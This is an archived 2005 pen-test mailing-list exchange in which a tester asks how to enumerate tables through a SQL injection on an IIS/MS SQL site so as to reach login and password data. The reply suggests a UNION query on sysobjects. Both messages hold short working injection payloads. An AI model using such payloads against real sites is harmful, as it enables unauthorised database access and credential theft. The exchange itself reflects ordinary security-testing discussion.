RE: MS SQL, find list of tables

["Velasco Herrero, Jose Antonio" <joseantonio.velasco () t-systems es>]

Did you try something like this?

<somethin.asp?page= 'UNION ALL SELECT name FROM sysobjects WHERE xtype='U

AFAIK MSysObjects is not an MS SQL Server table but an Access one.

I hope this helps

Jose

> -----Mensaje original-----
> De: Cedric Foll [mailto:cedric.foll () ac-rouen fr]
> Enviado el: lunes, 26 de septiembre de 2005 16:01
> Para: pen-test () securityfocus com
> Asunto: MS SQL, find list of tables
>
> Hi,
>
> I'm doing a pen test on a IIS/MS SQL box and find a SQL Injection on it
> which permit to execute some SQL command on it.
>
> In fact I have a "select" where I can inject an "UNION something".
> I'd like to use that in order to get login/passwd in the database.
>
> I can do:
> <somethin.asp?page=contact' UNION SELECT * FROM users WHERE '1'='1>
> But the table users doesn't exist and I failed to guess an existing
> table name :(.
>
> I've tried:
> <something.asp?page=contact' UNION SELECT * FROM MSysObjects'>
> but I get
> ----
> Microsoft OLE DB Provider for ODBC Drivers error '80040e09'
>
> [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no
> read permission on 'MSysObjects'.
> ----
>
> Someone has an idea ????
>
> Regards
>
> --
> Cedric Foll
> Ingénieur Sécurité & Réseaux
> Division Informatique, Rectorat de Rouen
>
> "More people are killed every year by pigs than by sharks,
> which shows you how good we are at evaluating risk."
> Bruce Schneier
>
> --------------------------------------------------------------------------
> ----
> Audit your website security with Acunetix Web Vulnerability Scanner:
>
> Hackers are concentrating their efforts on attacking applications on your
> website. Up to 75% of cyber attacks are launched on shopping carts, forms,
> login pages, dynamic content etc. Firewalls, SSL and locked-down servers
> are
> futile against web application hacking. Check your website for
> vulnerabilities
> to SQL injection, Cross site scripting and other web attacks before
> hackers do!
> Download Trial at:
>
> http://www.securityfocus.com/sponsor/pen-test_050831
> --------------------------------------------------------------------------
> -----



--------------------------------------------------------------------------------
INFORMACION IMPORTANTE - IMPORTANT NEWS
--------------------------------------------------------------------------------
A partir del 12 de septiembre de 2005,  nuestras oficinas de Avda. Llano Castellano y Capitán Haya en Madrid, se 
trasladan a:
As from September 12, 2005, our offices in:  Avda. Llano Castellano and Capitán Haya (Madrid) are moving to a new 
address:

------ Calle Orduña, 2 - 28034 Madrid ------

Nuestros números de teléfono y de fax así como nuestras direcciones de correo electrónico permanecen sin cambios.
Our telephone and fax numbers as well as our e-mail addresses remain the same.
----------------------------------------
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
This e-mail may contain confidential or privileged information. Any unauthorised
copying, use or distribution of this information is strictly prohibited. If you are not the
intended recipient, please notify the sender and destroy this e-mail together with all of
its content.
--------------------------------------------------------------------------------
Este mensaje electrónico puede contener información confidencial o privilegiada, por lo
que está completamente prohibida la copia, el uso o la distribución no autorizada de
dicha información. Si usted no es el destinatario del mensaje, le rogamos que lo
notifique al remitente y que lo destruya junto con todo su contenido.
--------------------------------------------------------------------------------
Aquest missatge electrònic pot contenir informació confidencial o privilegiada i està
completament prohibida qualsevol còpia, ús o distribució no autoritzada d'aquesta
informació. Si vostè no és el seu destinatari, si us plau notifiqui-ho al remitent i
destrueixi el missatge amb tot el seu contingut.
--------------------------------------------------------------------------------
Mezu elektroniko honek informazio konfidentziala edo pribilegiatua eduki dezake.
Erabat debekaturik dago informazio hori baimenik gabe kopiatu, erabili edo banatzea.
Mezu hau ez bada zuri zuzendua, arren, igortzaileari jakinarazi eta bere edukiarekin
batera ezaba ezazu.
--------------------------------------------------------------------------------
Esta mensaxe electrónica pode conter información confidencial ou privilexiada e está
completamente prohibida calquera copia, uso ou distribución non autorizado desta
información. Se vostede non é o seu destinatario, faga o favor de llo notificar ao
remitente e destrúa a mensaxe e todo o seu contido.
--------------------------------------------------------------------------------

------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner:

Hackers are concentrating their efforts on attacking applications on your
website. Up to 75% of cyber attacks are launched on shopping carts, forms,
login pages, dynamic content etc. Firewalls, SSL and locked-down servers are
futile against web application hacking. Check your website for vulnerabilities
to SQL injection, Cross site scripting and other web attacks before hackers do!
Download Trial at:

http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------